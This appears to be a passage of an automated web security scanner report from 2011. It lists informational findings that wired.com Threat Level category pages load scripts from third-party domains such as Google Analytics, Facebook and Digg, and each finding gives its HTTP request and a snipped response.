Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:33 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=260
Expires: Wed, 12 Jan 2011 15:32:57 GMT
Date: Wed, 12 Jan 2011 15:28:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.90. http://www.wired.com/threatlevel/category/censorship/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/censorship/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/censorship/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:10:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=298
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.91. http://www.wired.com/threatlevel/category/chaos-computer-club/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/chaos-computer-club/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/chaos-computer-club/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:07:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=246
Expires: Wed, 12 Jan 2011 15:32:53 GMT
Date: Wed, 12 Jan 2011 15:28:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.92. http://www.wired.com/threatlevel/category/conferences/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/conferences/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/conferences/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=272
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:28:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.93. http://www.wired.com/threatlevel/category/copyrights-and-patents/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/copyrights-and-patents/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/copyrights-and-patents/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=278
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.94. http://www.wired.com/threatlevel/category/coverups/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/coverups/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/coverups/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=246
Expires: Wed, 12 Jan 2011 15:33:07 GMT
Date: Wed, 12 Jan 2011 15:29:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.95. http://www.wired.com/threatlevel/category/crime/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/crime/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/crime/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=223
Expires: Wed, 12 Jan 2011 15:32:55 GMT
Date: Wed, 12 Jan 2011 15:29:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.96. http://www.wired.com/threatlevel/category/crypto/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/crypto/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/crypto/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=266
Expires: Wed, 12 Jan 2011 15:33:41 GMT
Date: Wed, 12 Jan 2011 15:29:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.97. http://www.wired.com/threatlevel/category/cybarmageddon/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/cybarmageddon/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/cybarmageddon/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:59:28 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=303
Expires: Wed, 12 Jan 2011 15:34:26 GMT
Date: Wed, 12 Jan 2011 15:29:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.98. http://www.wired.com/threatlevel/category/cyber-warfare/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/cyber-warfare/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/cyber-warfare/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:56 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=272
Expires: Wed, 12 Jan 2011 15:34:02 GMT
Date: Wed, 12 Jan 2011 15:29:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.99. http://www.wired.com/threatlevel/category/cyberbullying/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/cyberbullying/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/cyberbullying/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=223
Expires: Wed, 12 Jan 2011 15:33:22 GMT
Date: Wed, 12 Jan 2011 15:29:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.100. http://www.wired.com/threatlevel/category/cybersecurity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/cybersecurity/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/cybersecurity/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:24 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=170
Expires: Wed, 12 Jan 2011 15:32:31 GMT
Date: Wed, 12 Jan 2011 15:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.101. http://www.wired.com/threatlevel/category/defcon/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/defcon/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/defcon/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=167
Expires: Wed, 12 Jan 2011 15:32:33 GMT
Date: Wed, 12 Jan 2011 15:29:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.102. http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/digital-millennium-copyright-act/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/digital-millennium-copyright-act/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:44 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=283
Expires: Wed, 12 Jan 2011 15:34:30 GMT
Date: Wed, 12 Jan 2011 15:29:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
